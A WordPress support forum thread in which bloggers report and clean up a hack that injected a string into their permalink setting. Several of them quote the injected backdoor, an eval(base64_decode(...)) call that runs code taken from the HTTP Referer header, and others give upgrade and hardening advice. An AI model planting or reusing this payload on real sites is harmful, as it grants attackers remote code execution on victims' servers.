I updated to WP 2.8.4 which did not fix the problem. I deactivated all my plugins and this did not fix the Permalink issue.
In WP 2.8.4, the extra stuff shows up in the as the Permalink as I am creating a new post. But the extra characters:
/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
are not editable. I would have thought that any hack would have been over written by the update to 2.8.4.
Ok. I looked at the Permalink options and somehow the extra characters when in there. Very odd. I guess I solved my problem. But I still would like to hear from a Blog guru or two about how this could have happened. I did not put it there and the string was not random so it doesn’t look like an accident. Thanks. Andy
Same deal with my wife’s blog @ http://mummy.guru.net.nz/
Similar story – regular posting but no upgrading or anything recently.
Investigating now, found this post after Googling for the string appended onto the permalink URL.
And same with one I work on http://www.touchstoneblog.org.uk –
Likewise I found this via googling this exact string. Checked the permalinks page and all that gunk was indeed appended to my string, even though I’d not changed that setting in a year. Using version 2.7.1
This is very odd. Going to check my other wordpress blogs now.
Roy
(@gangleri)
Dammit people, running old versions of WP is an application for getting hacked! And guru “WordPress 2.7-hemorrhage”?!? Your wife doesn’t even use a final version of 2.7! Did you ever look up that word “hemorrhage”? It means that this test version leaks blood like a person shot to Swiss cheese with an automatic weapon.
I don’t know anything about this particular hack, but I advise you to after cleaning up the mess, upgrade, stay updated and read that nice article about Hardening WordPress in the codex.
Yes – it’s happened to another one too,
http://www.strongerunions.org – which is on 2.62
But oddly not to the other 6 wordpress blogs I run (yet).
True Gangleri, will get busy upgrading!
Fair cop Gangleri, upgraded to 2.8.4 now need to clean up. Looks like something managed to get into the custom permalink option. Removing it appears to fix the problem.
Roy
(@gangleri)
John, it’s probably the work of some “scriptkiddy” or a bot looking for old WP’s. It’s still unclear to me what the purpose of this hack is. I found a nice article that describes how eval base functions are used to get information from databases, but the only thing interesting in that regard would be the users table in my opinion and why use the permalinks to do that? Maybe the hacker tries to get something from the computers of people clicking on the links? In any case, are the edited permalinks the only thing that happens? No new users, spam injections, filed edited or added?
Reading tips:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
When that’s done:
Change ALL passwords (yes I also mean database, FTP and control panel) and read this:
http://codex.wordpress.org/Hardening_WordPress
[edited]: just thought about something: decoded themes with the same kind of coding, coincidense?
Thanks for all the help Gangleri, some very useful info there for novices like me!
So that’s my morning cut out for me then…
Don’t recognise any new users, or even if there are, they’re only subscriber level, nothing author or above.
No new posts/pages, and can’t see any new folders or files on the server when sorting them by last update. So fingers crossed it was just someone proving they could change something, even if it wasn’t any concrete use to them.
I just noticed the same problem on one of my blogs (PainInTheEnglish.com). So, this appears to be pretty wide-spread. Keeping up with WordPress’s security issues is becoming a full-time job.
I had the same. Thanks to the info here I was able to get rid of it. So thanks!
I am having the same problem. Multiple times now in the last 24 hours. I keep fixing it, it keeps coming back.
Not sure what to do.
permalinks end up with this crap:
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
